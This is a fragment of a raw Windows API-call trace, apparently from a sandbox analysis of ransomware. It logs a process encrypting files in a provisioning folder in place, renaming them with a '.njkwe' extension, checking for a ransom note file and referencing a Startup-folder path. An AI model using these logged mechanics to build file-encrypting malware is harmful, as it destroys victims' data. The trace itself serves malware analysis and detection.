nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x34a, lpOverlapped=0x0) returned 1 [0076.816] GetProcessHeap () returned 0xbe0000 [0076.816] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.816] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.816] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.816] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.817] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.817] CloseHandle (hObject=0x43c) returned 1 [0076.817] GetProcessHeap () returned 0xbe0000 [0076.817] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.817] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0076.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\145__connections_cellular_orange (france)_i6$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\145__Connections_Cellular_Orange (France)_i6$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\145__connections_cellular_orange (france)_i6$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.818] GetProcessHeap () returned 0xbe0000 [0076.818] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.818] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905b56bb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905b56bb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905b56bb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", cAlternateFileName="146__C~1.PRO")) returned 1 [0076.873] lstrcmpiW (lpString1="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.873] lstrcmpiW (lpString1="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.873] lstrcmpiW (lpString1="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.873] lstrcmpiW (lpString1="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.873] lstrcmpiW (lpString1="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.873] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml") returned 156 [0076.873] StrStrIW (lpFirst="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.873] lstrcmpW (lpString1="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.874] lstrcmpW (lpString1="146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.874] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\146__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.874] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\146__connections_cellular_sfr (france)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.874] GetTickCount () returned 0x11538ee [0076.874] GetTickCount () returned 0x11538ee [0076.874] GetTickCount () returned 0x11538ee [0076.874] GetTickCount () returned 0x11538ee [0076.874] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.874] GetProcessHeap () returned 0xbe0000 [0076.874] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.874] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0076.876] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.876] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c2, lpOverlapped=0x0) returned 1 [0076.876] GetProcessHeap () returned 0xbe0000 [0076.876] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.876] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.876] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.876] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.877] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.877] CloseHandle (hObject=0x43c) returned 1 [0076.877] GetProcessHeap () returned 0xbe0000 [0076.877] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.877] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0076.877] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\146__connections_cellular_sfr (france)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\146__Connections_Cellular_SFR (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\146__connections_cellular_sfr (france)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.878] GetProcessHeap () returned 0xbe0000 [0076.878] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.878] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905b56bb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905b56bb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905b56bb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", cAlternateFileName="147__C~1.PRO")) returned 1 [0076.878] lstrcmpiW (lpString1="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.878] lstrcmpiW (lpString1="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.878] lstrcmpiW (lpString1="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.878] lstrcmpiW (lpString1="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.878] lstrcmpiW (lpString1="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.878] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml") returned 156 [0076.878] StrStrIW (lpFirst="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.878] lstrcmpW (lpString1="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.878] lstrcmpW (lpString1="147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.878] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\147__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.878] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\147__connections_cellular_sfr (france)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.878] GetTickCount () returned 0x11538ee [0076.878] GetTickCount () returned 0x11538ee [0076.878] GetTickCount () returned 0x11538ee [0076.878] GetTickCount () returned 0x11538ee [0076.878] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.878] GetProcessHeap () returned 0xbe0000 [0076.878] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.878] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0076.880] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.880] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0076.880] GetProcessHeap () returned 0xbe0000 [0076.880] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.880] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.880] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.880] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.880] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.880] CloseHandle (hObject=0x43c) returned 1 [0076.880] GetProcessHeap () returned 0xbe0000 [0076.880] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.880] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0076.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\147__connections_cellular_sfr (france)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\147__Connections_Cellular_SFR (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\147__connections_cellular_sfr (france)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.881] GetProcessHeap () returned 0xbe0000 [0076.881] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.881] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905db923, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905db923, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905db923, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", cAlternateFileName="148__C~1.PRO")) returned 1 [0076.881] lstrcmpiW (lpString1="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.881] lstrcmpiW (lpString1="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.881] lstrcmpiW (lpString1="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.881] lstrcmpiW (lpString1="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.881] lstrcmpiW (lpString1="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.881] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml") returned 156 [0076.881] StrStrIW (lpFirst="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.881] lstrcmpW (lpString1="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.881] lstrcmpW (lpString1="148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.881] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\148__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.881] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\148__connections_cellular_sfr (france)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.882] GetTickCount () returned 0x11538ee [0076.882] GetTickCount () returned 0x11538ee [0076.882] GetTickCount () returned 0x11538ee [0076.882] GetTickCount () returned 0x11538ee [0076.882] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.882] GetProcessHeap () returned 0xbe0000 [0076.882] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.882] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0076.883] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.883] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0076.884] GetProcessHeap () returned 0xbe0000 [0076.884] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.884] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.884] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.884] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.884] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.884] CloseHandle (hObject=0x43c) returned 1 [0076.884] GetProcessHeap () returned 0xbe0000 [0076.884] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.884] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0076.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\148__connections_cellular_sfr (france)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\148__Connections_Cellular_SFR (France)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\148__connections_cellular_sfr (france)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.885] GetProcessHeap () returned 0xbe0000 [0076.885] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.885] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905db923, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905db923, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905db923, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", cAlternateFileName="149__C~1.PRO")) returned 1 [0076.885] lstrcmpiW (lpString1="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.885] lstrcmpiW (lpString1="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.885] lstrcmpiW (lpString1="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.885] lstrcmpiW (lpString1="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.885] lstrcmpiW (lpString1="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.885] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml") returned 156 [0076.885] StrStrIW (lpFirst="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.885] lstrcmpW (lpString1="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.885] lstrcmpW (lpString1="149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.885] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\149__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.885] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\149__connections_cellular_sfr (france)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.885] GetTickCount () returned 0x11538ee [0076.885] GetTickCount () returned 0x11538ee [0076.885] GetTickCount () returned 0x11538ee [0076.885] GetTickCount () returned 0x11538ee [0076.885] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: 